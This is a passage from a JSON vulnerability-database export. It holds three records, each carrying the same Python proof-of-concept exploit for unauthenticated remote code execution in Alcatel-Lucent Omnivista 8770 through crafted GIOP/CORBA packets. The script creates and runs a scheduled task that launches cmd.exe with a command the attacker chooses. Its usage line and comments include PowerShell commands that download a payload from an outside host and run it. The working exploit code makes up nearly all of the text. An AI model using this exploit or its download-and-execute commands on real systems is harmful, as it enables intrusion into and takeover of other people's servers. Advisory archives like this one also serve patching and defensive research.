p.recv(1024)\r\n\r\nprint \"All packets sent...\"\r\nprint \"Exploit sequence completed, command should have been executed...:-)\"\r\n\r\np.close()\r\n\r\n# optional requests to remove the job after the exploitation\r\n\r\n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista\r\n\r\n##phase5 - abort the job\r\n\r\ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + \"0000000743616e63656c000000000000\"\r\n\r\n###phase6 - delete the jobset \r\n\r\ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\"\t\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40862/"}], "zdt": [{"lastseen": "2018-03-17T03:08:49", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "href": "https://0day.today/exploit/description/26467", "id": "1337DAY-ID-26467", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "import socket\r\nimport time\r\nimport sys\r\nimport os\r\n \r\n# ref https://blog.malerisch.net/\r\n# Omnivista Alcatel-Lucent running on Windows Server\r\n \r\n \r\nif len(sys.argv) < 2:\r\n print \"Usage: %s <target> <command>\" % sys.argv[0]\r\n print \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\ntarget = sys.argv[1]\r\nargument1 = ' '.join(sys.argv[2:])\r\n \r\n# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...\r\n \r\nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read()\r\nnetbiosname = netbiosname.strip(\"\\n\")\r\n \r\n# dirty functions to do hex magic with bytes...\r\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte\r\n### needs to calculate for each\r\n### \r\n \r\ndef calcsize(giop):\r\n \r\n s = len(giop.decode('hex'))\r\n h = hex(s) #\"\\x04\" -> \"04\"\r\n return h[2:].zfill(8) # it's 4 bytes for the size\r\n \r\ndef calcstring(param): # 1 byte size calc\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...\r\n \r\ndef calcstring2(param):\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(4)\r\n \r\n \r\n \r\n##\r\n \r\n#GIOP request size is specified at the 11th byte\r\n \r\n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............\r\n# d8 is the size of GIOP REQUEST\r\n \r\n# GIOP HEADER Is 12 bytes -\r\n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte\r\n \r\n \r\n \r\n#phase 1 - add a jobset\r\n \r\ngiopid = 1 # an arbitrary ID can be put there...\r\n \r\n# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...\r\n \r\nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\"\r\n \r\n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex')))\r\n \r\njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet...\r\n \r\n \r\naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed???\r\n \r\nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\"\r\nprint \"Connecting to target...\"\r\n \r\n \r\n \r\n \r\np = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\np.connect((target, 30024))\r\n \r\n \r\n#p = remote(target, 30024, \"ipv4\", \"tcp\")\r\n \r\nprint \"Adding a job...\"\r\n \r\np.send(addjobset.decode('hex'))\r\n \r\n#p.recv()\r\n \r\ndata = p.recv(1024)\r\n \r\ns = len(data)\r\n \r\n#objectkey = \"\" # last 16 bytes of the response!\r\n \r\nobjectkey = data[s-16:s].encode('hex')\r\n \r\n#print objectkey\r\n \r\n# phase 2 - active jobset\r\n \r\nprint \"Sending active packet against the job\"\r\n \r\nactivegiopid = 2\r\nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\"\r\n \r\n#print active\r\n \r\np.send(active.decode('hex'))\r\n \r\ndata2 = p.recv(1024)\r\n \r\n#print data2\r\n \r\n# phase3 add task\r\n \r\naddjobid = 3\r\n \r\nprint \"Adding a task....\"\r\n \r\ntaskname = \"BBBBBBB\".encode('hex')\r\nservername = netbiosname.encode('hex')\r\ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit\r\n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit\r\ncommandsize = hex((len(command.decode('hex'))+1))\r\ncommandsize = str(commandsize).replace(\"0x\",\"\")\r\n \r\n#print \"Command size: \"+ str(commandsize)\r\n \r\n#print command.decode('hex')\r\n \r\n#time.sleep(10)\r\n \r\n#powershell = str(command)\r\n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\"\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\nargument = str(\"/c \"+argument1).encode('hex')\r\n#argument = str(\"/c notepad.exe\").encode('hex')\r\n \r\n#print len(argument.decode('hex'))\r\n \r\n#argumentsize = len(str(\"/c \"+powershell))+1\r\n \r\n#print \"Argument size: \"+str(argumentsize)\r\n \r\nargumentsize = calcstring2(argument)\r\n \r\n#print \"argument size: \"+str(argumentsize)\r\n \r\n#print argument.decode('hex')\r\n \r\ndef calcpadd(giop):\r\n defaultpadding = \"00000000000001\"\r\n check = giop + defaultpadding + fixedpadding\r\n s = len(check)\r\n #print \"Size: \"+str(s)\r\n if (s/2) % 4 == 0:\r\n #print \"size ok!\"\r\n return check\r\n else:\r\n # fix the default padding\r\n #print \"Size not ok, recalculating padd...\"\r\n dif = (s/2) % 4\r\n #print \"diff: \"+str(dif)\r\n newpadding = defaultpadding[dif*2:]\r\n #print \"Newpadding: \" +str(newpadding)\r\n return giop + newpadding + fixedpadding\r\n \r\n \r\n \r\n \r\naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message\r\n \r\nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\"\r\n \r\nvariablepadding = \"000000000001\"\r\n \r\n#print calcstring(servername)\r\n#print calcstring(taskname)\r\n \r\n#print \"Command:\" +str(command)\r\n#print \"command size:\"+str(commandsize)\r\n \r\naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\"\r\n \r\n#print addjob\r\n \r\naddjobfin = calcpadd(addjob)\r\n \r\n#print addjobfin.decode('hex')\r\n \r\naddjobsize = calcsize(addjobfin)\r\n \r\n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex')))\r\n \r\n# we need to add the header\r\n \r\nfinalmsg = addjobhdr + addjobsize + addjobfin\r\n \r\n \r\np.send(finalmsg.decode('hex'))\r\n \r\ndata3 = p.recv(1024)\r\n \r\n#print data3\r\n \r\n# phase4 - execute task\r\n \r\nexecuteid = 4\r\n \r\nprint \"Executing task...\"\r\n \r\nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\"\r\n \r\np.send(execute.decode('hex'))\r\n \r\ndata4 = p.recv(1024)\r\n \r\nprint \"All packets sent...\"\r\nprint \"Exploit sequence completed, command should have been executed...:-)\"\r\n \r\np.close()\r\n \r\n# optional requests to remove the job after the exploitation\r\n \r\n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista\r\n \r\n##phase5 - abort the job\r\n \r\ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + \"0000000743616e63656c000000000000\"\r\n \r\n###phase6 - delete the jobset \r\n \r\ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\"\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26467"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:23", "bulletinFamily": "exploit", "description": "", "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "href": "https://packetstormsecurity.com/files/140026/Alcatel-Lucent-Omnivista-8770-Remote-Code-Execution.html", "id": "PACKETSTORM:140026", "type": "packetstorm", "title": "Alcatel Lucent Omnivista 8770 Remote Code Execution", "sourceData": "`import socket \nimport time \nimport sys \nimport os \n \n# ref https://blog.malerisch.net/ \n# Omnivista Alcatel-Lucent running on Windows Server \n \n \nif len(sys.argv) < 2: \nprint \"Usage: %s <target> <command>\" % sys.argv[0] \nprint \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0] \nsys.exit(1) \n \ntarget = sys.argv[1] \nargument1 = ' '.join(sys.argv[2:]) \n \n# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly... \n \nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read() \nnetbiosname = netbiosname.strip(\"\\n\") \n \n# dirty functions to do hex magic with bytes... \n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte \n### needs to calculate for each \n### \n \ndef calcsize(giop): \n \ns = len(giop.decode('hex')) \nh = hex(s) #\"\\x04\" -> \"04\" \nreturn h[2:].zfill(8) # it's 4 bytes for the size \n \ndef calcstring(param): # 1 byte size calc \n \ns = (len(param)/2)+1 \nh = hex(s) \nreturn h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty... \n \ndef calcstring2(param): \n \ns = (len(param)/2)+1 \nh = hex(s) \nreturn h[2:].zfill(4) \n \n \n \n## \n \n#GIOP request size is specified at the 11th byte \n \n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............ \n# d8 is the size of GIOP REQUEST \n \n# GIOP HEADER Is 12 bytes - \n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte \n \n \n \n#phase 1 - add a jobset \n \ngiopid = 1 # an arbitrary ID can be put there... \n \n# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right... \n \nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\" \n \n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex'))) \n \njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet... \n \n \naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed??? \n \nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\" \nprint \"Connecting to target...\" \n \n \n \n \np = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \np.connect((target, 30024)) \n \n \n#p = remote(target, 30024, \"ipv4\", \"tcp\") \n \nprint \"Adding a job...\" \n \np.send(addjobset.decode('hex')) \n \n#p.recv() \n \ndata = p.recv(1024) \n \ns = len(data) \n \n#objectkey = \"\" # last 16 bytes of the response! \n \nobjectkey = data[s-16:s].encode('hex') \n \n#print objectkey \n \n# phase 2 - active jobset \n \nprint \"Sending active packet against the job\" \n \nactivegiopid = 2 \nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\" \n \n#print active \n \np.send(active.decode('hex')) \n \ndata2 = p.recv(1024) \n \n#print data2 \n \n# phase3 add task \n \naddjobid = 3 \n \nprint \"Adding a task....\" \n \ntaskname = \"BBBBBBB\".encode('hex') \nservername = netbiosname.encode('hex') \ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit \n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit \ncommandsize = hex((len(command.decode('hex'))+1)) \ncommandsize = str(commandsize).replace(\"0x\",\"\") \n \n#print \"Command size: \"+ str(commandsize) \n \n#print command.decode('hex') \n \n#time.sleep(10) \n \n#powershell = str(command) \n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\" \n \n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/'); \n \n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/'); \n \nargument = str(\"/c \"+argument1).encode('hex') \n#argument = str(\"/c notepad.exe\").encode('hex') \n \n#print len(argument.decode('hex')) \n \n#argumentsize = len(str(\"/c \"+powershell))+1 \n \n#print \"Argument size: \"+str(argumentsize) \n \nargumentsize = calcstring2(argument) \n \n#print \"argument size: \"+str(argumentsize) \n \n#print argument.decode('hex') \n \ndef calcpadd(giop): \ndefaultpadding = \"00000000000001\" \ncheck = giop + defaultpadding + fixedpadding \ns = len(check) \n#print \"Size: \"+str(s) \nif (s/2) % 4 == 0: \n#print \"size ok!\" \nreturn check \nelse: \n# fix the default padding \n#print \"Size not ok, recalculating padd...\" \ndif = (s/2) % 4 \n#print \"diff: \"+str(dif) \nnewpadding = defaultpadding[dif*2:] \n#print \"Newpadding: \" +str(newpadding) \nreturn giop + newpadding + fixedpadding \n \n \n \n \naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message \n \nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\" \n \nvariablepadding = \"000000000001\" \n \n#print calcstring(servername) \n#print calcstring(taskname) \n \n#print \"Command:\" +str(command) \n#print \"command size:\"+str(commandsize) \n \naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\" \n \n#print addjob \n \naddjobfin = calcpadd(addjob) \n \n#print addjobfin.decode('hex') \n \naddjobsize = calcsize(addjobfin) \n \n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex'))) \n \n# we need to add the header \n \nfinalmsg = addjobhdr + addjobsize + addjobfin \n \n \np.send(finalmsg.decode('hex')) \n \ndata3 = p.recv(1024) \n \n#print data3 \n \n# phase4 - execute task \n \nexecuteid = 4 \n \nprint \"Executing task...\" \n \nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\" \n \np.send(execute.decode('hex')) \n \ndata4 = p.recv(1024) \n \nprint \"All packets sent...\" \nprint \"Exploit sequence completed, command should have been executed...:-)\" \n \np.close() \n \n# optional requests to remove the job after the exploitation \n \n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista \n \n##phase5 - abort the job \n \ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + \"0000000743616e63656c000000000000\" \n \n###phase6 - delete the jobset \n \ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\" \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140026/alcatellucentomnivista-exec.txt"}]}
